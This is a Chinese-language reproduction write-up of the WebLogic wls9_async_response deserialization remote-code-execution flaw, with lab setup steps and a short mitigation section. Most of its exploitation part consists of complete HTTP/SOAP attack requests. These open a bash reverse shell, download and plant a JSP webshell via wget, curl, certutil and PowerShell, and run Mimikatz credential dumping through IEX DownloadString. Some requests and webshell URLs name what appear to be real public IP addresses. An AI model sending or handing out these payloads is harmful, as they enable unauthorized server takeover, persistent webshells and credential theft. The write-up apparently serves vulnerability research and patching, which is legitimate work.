CNVD-2019-48814 Weblogic wls9_async_response 反序列化RCE漏洞复现
0x00 事件背景
2019年4月17日,国家信息安全漏洞共享平台(CNVD)收录了由中国民生银行股份有限公司报送的Oracle WebLogic wls9-async反序列化远程命令执行漏洞(CNVD-C-2019-48814)。攻击者利用该漏洞,可在未授权的情况下远程执行命令。目前,官方补丁尚未发布,漏洞细节未公开。CNVD对该漏洞的综合评级为“高危”
0x01 漏洞情况分析
WebLogic Server是美国甲骨文(Oracle)公司开发的一款适用于云环境和传统环境的应用服务中间件,它提供了一个现代轻型开发平台,支持应用从开发到生产的整个生命周期管理,并简化了应用的部署和管理。
部分版本WebLogic中默认包含的wls9_async_response包,为WebLogic Server提供异步通讯服务。由于该WAR包在反序列化处理输入信息时存在缺陷,攻击者可以发送精心构造的恶意 HTTP 请求,获得目标服务器的权限,在未授权的情况下远程执行命令。
CNVD对该漏洞的综合评级为“高危”。
0x02 漏洞描述
近日,互联网爆出WebLogicwls9-async反序列化远程命令执行漏洞。攻击者利用该漏洞,可在未授权的情况下远程执行命令。该漏洞危害程度为高危(High)。目前,官方补丁尚未发布,漏洞细节未公开。
0x02 漏洞影响范围
1.影响产品:
- Oracle WebLogic Server10.3.6.0.0
- Oracle WebLogic Server12.1.3.0.0
- Oracle WebLogic Server12.2.1.1.0
- Oracle WebLogic Server12.2.1.2.0
2.影响组件:
- bea_wls9_async_response.war
- wsat.war
0x03 漏洞复现
一、liunx下的环境搭建
- 攻击机: Kali2019
- 漏洞靶机:ubuntu16.04(docker vulhub) Weblogic10.3.6(wls1036_generic.jar)
1.在Ubuntu 16.04上安装docker和docker-compose:
(1).安装PIP
curl -s https://bootstrap.pypa.io/get-pip.py | python3
(2).安装docker
curl -s https://get.docker.com/ | sh
(3).启动docker服务
service docker start
(4).安装docker compose
pip install docker-compose
2.使用方法
(1).下载漏洞环境项目
git clone https://github.com/vulhub/vulhub.git
(2).进入到nexus利用环境
cd vulhub/weblogic/CVE-2017-10271
(3).执行如下命令启动weblogic服务
docker-compose up -d
等待一段时间,访问http://your-ip:7001/即可看到一个404页面,说明weblogic已成功启动。
3.检测方法
用户可通过访问路径http://ip:port/_async/AsyncResponseService来判断该组件是否开启。若返回如下页面,则此组件开启。请及时采取防护措施
打开URL(http://IP:端口/_async/),提示错误403且含有“From RFC 2068 Hypertext Transfer Protocol -- HTTP/1.1:”可判断存在Oracle Oracle WebLogic wls9-async反序列化远程命令执行漏洞。
http://149.248.54.82:7001/_async/AsyncResponseService
二、linux下.漏洞利用
1.反弹shell利用:
(1).攻击机主机的IP地址如下,并用nc监听反弹端口
(2).通过burpsuit向weblogic服务发送攻击包,如下图所示
POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 853
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i >& /dev/tcp/vpsip/vpsport 0>&1</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>
![]()
2.上传webshell
(1).在kali攻击机上可搭建一个简单的web服务器,然后将webshll.txt放到其下
(2)使用以下poc进行发送攻击
poc1:
POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 789
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>wget http://vpsip:vpsport/webshell.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell.jsp</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>
![]()
poc2:
POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 789
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>curl http://vpsip:vpsport/webshell.txt -o servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell.jsp</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>
(3).访问webshell
http://149.248.54.82:7001/_async/test.jsp
三、winddows下的环境搭建
1.weblogic12.1.3.0.0安装
下载地址:https://www.oracle.com/technetwork/middleware/weblogic/downloads/index.html
开始安装:(需要java环境支持,记得配置JAVA环境变量)
1.weblogic12.1.3.0.0安装
下载地址:https://www.oracle.com/technetwork/middleware/weblogic/downloads/index.html
开始安装:(需要java环境支持,记得配置JAVA环境变量)
任选下面其一的安装包,我这里选择的是12.1.3.0
2.打开cmd执行:
C:\Program Files\Java\jdk1.8.0_152\bin\java -jar c:\fmw_12.1.3.0.0_wls.jar
用 C:\Program Files\Java\jdk1.8.0_121\bin\ 目录下的 java.exe 来执行weblogic12c的jar包(默认使用顺序,似乎首先用的是C:\Program Files\Java\jdk1.8.0_121\jre\bin\下的java.exe,所以会包jre不是有效的JDK),所以在cmd里要输入 C:\Program Files\Java\jdk1.8.0_152\bin\java -jar c:\fmw_12.1.3.0.0_wls.jar(这里之所以要用Progra~1 来代替Program Files是因为有 空格 会识别错误)
3.等待一会会弹出安装程序:
4.配置完成后,找到startWebLogic.cmd双击启动weblodgic
5.访问http://127.0.0.1:7001/console验证
四、windows下的漏洞利用:
1.打开地址http://ip:port/_async/AsyncResponseSevice查看是否存在漏洞
2.反弹shell,可直接使用CobaltStrike生成一个payload.ps1 powershell脚本,将该脚本放到公网上,然后使用以下poc进行发送:
POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 861
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>powershell "IEX (New-Object Net.WebClient).DownloadString('http://ip:port/payload.ps1'); Invoke-Mimikatz -DumpCreds"</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>可以看到成功在cobalstrike上反弹出目标系统的shell![]()
3.上传webshell
(1).放置一个webshell.txt到公网主机上(这里是kali主机)
2.使用以下poc进行发送请求:
poc1:
POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 854
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>powershell (new-object System.Net.WebClient).DownloadFile( 'http://ip:port/webshell.txt','servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell.jsp')</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>
poc2:
POST /_async/AsyncResponseService HTTP/1.1Host: 172.16.191.51:7001Content-Length: 870Accept-Encoding: gzip, deflateSOAPAction: Accept: */*User-Agent: Apache-HttpClient/4.1.1 (java 1.5)Connection: keep-alivecontent-type: text/xml <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"> <soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><void class="java.lang.ProcessBuilder"><array class="java.lang.String" length="3"><void index="0"><string>cmd</string></void><void index="1"><string>/c</string></void><void index="2"><string>certutil -urlcache -split -f http://149.248.17.172:81/jshell.txt servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/webshell.jsp</string></void></array><void method="start"/></void></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>(3).访问webshell
http://172.16.191.51:7001/bea_wls_internal/webshell.jsp
0x04 漏洞修复建议
目前,Oracle官方暂未发布补丁,临时解决方案如下:
1.删除该war包并重启webLogic;
2.通过访问策略控制禁止 /_async/* 路径的URL访问。
建议使用WebLogic Server构建网站的信息系统运营者进行自查,发现存在漏洞后,按照临时解决方案及时进行修复。
附录:
附录其他辅助工具:
https://github.com/backlion/WebLogic_CNVD_C2019_48814
<wiz_tmp_tag id="wiz-table-range-border" contenteditable="false" style="display: none;">
